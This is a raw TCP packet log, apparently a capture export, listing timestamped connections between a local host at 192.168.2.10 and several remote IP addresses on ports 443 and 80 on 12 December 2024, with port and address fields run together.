                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.435369968 CET4434990934.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.438337088 CET4434990934.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.438441992 CET49909443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.441504955 CET49909443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.487334013 CET4434990934.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.497323990 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.497395039 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.497416019 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.497457981 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.501360893 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.501422882 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.520493031 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.568941116 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.571631908 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.572913885 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.572976112 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.572982073 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.573015928 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.580950975 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.583619118 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.583626032 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.583663940 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.587997913 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.591635942 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.595854044 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.599647045 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.599653006 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.599692106 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.605418921 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.605463028 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.607120037 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.607171059 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.614598036 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.614655018 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.620942116 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.621007919 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.624160051 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.627610922 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.634438992 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.635668993 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.636178017 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.636256933 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.650352001 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.651623011 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.653439045 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.653496981 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.664561033 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.667603970 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.667654991 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.667711020 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.678116083 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.679620981 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.681332111 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.681384087 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.689080000 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.691617966 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.691625118 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.691664934 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.702780962 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.703203917 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.727999926 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.731663942 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.731674910 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.731714010 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.760776043 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.760870934 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.760899067 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.760955095 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.762955904 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.763051033 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.767296076 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.770734072 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.770812988 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.770833969 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.770872116 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.770915985 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.770956993 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.777282953 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.777442932 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.777515888 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.777538061 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.777576923 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.782505035 CET44349908149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.782584906 CET44349908149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.782701969 CET49908443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.788278103 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.789697886 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.789711952 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.789771080 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.791248083 CET49908443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.791265965 CET44349908149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.798979044 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.799344063 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.799362898 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.799403906 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.809108973 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.811503887 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.811512947 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.811564922 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.819111109 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.819629908 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.819638968 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.819688082 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.829456091 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.831619024 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.831630945 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.831676006 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.839693069 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.843628883 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.843641043 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.843686104 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.849706888 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.855631113 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.855642080 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.855684996 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.859582901 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.861712933 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.861720085 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.861761093 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.868969917 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.869029045 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.869144917 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.869199038 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.880820990 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.883625031 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.883634090 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.883673906 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.888350010 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.889080048 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.889089108 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.889127016 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.891380072 CET4434990934.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.891477108 CET4434990934.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.891535997 CET49909443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.896105051 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.897459030 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.897530079 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.897541046 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.897578955 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.904470921 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.907624960 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.907632113 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.907671928 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.912981987 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.915635109 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.915642023 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.915683031 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.919179916 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.919236898 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.920556068 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.921715975 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.925580978 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.931540966 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.931570053 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.933067083 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.933120966 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.933137894 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.933175087 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.933618069 CET49909443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.933645964 CET4434990934.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.938014030 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.939623117 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.939646006 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.939686060 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.944252014 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.945771933 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.952908039 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.954243898 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.954350948 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.954377890 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.954423904 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.956060886 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.957803011 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.957828045 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.957868099 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.960838079 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.961512089 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.962131977 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.963181973 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.966176033 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.969806910 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.969832897 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.969882965 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.971338034 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.971394062 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.972012043 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.972054958 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.976445913 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.977958918 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.977966070 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.977993965 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.981654882 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.981808901 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.981815100 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.981858015 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.986884117 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.991638899 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.991648912 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.991705894 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.991784096 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.991827965 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.991970062 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.992011070 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.997071981 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.999614954 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.999620914 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:29.999663115 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.001993895 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.002058983 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.002159119 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.002203941 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.006885052 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.011501074 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.011518002 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.011564970 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.011970043 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.012015104 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.012530088 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.012581110 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.016769886 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.016843081 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.016854048 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.016895056 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.021370888 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.021425009 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.021527052 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.021589994 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.026451111 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.026511908 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.026520014 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.026601076 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.026946068 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.026997089 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.027007103 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.027040958 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.033868074 CET49896443192.168.2.10172.217.17.65
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.033894062 CET44349896172.217.17.65192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.089102030 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.089155912 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.089220047 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.089602947 CET49916443192.168.2.10149.154.167.220
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.089618921 CET44349916149.154.167.220192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.208100080 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.208157063 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.208225012 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.208440065 CET49917443192.168.2.1034.117.59.81
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.208457947 CET4434991734.117.59.81192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727490902 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727545977 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727561951 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727586985 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727631092 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727699041 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727713108 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727725983 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727735043 CET4991280192.168.2.1031.41.244.11
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727741003 CET804991231.41.244.11192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:30.727752924 CET4991280192.168.2.1031.41.244.11
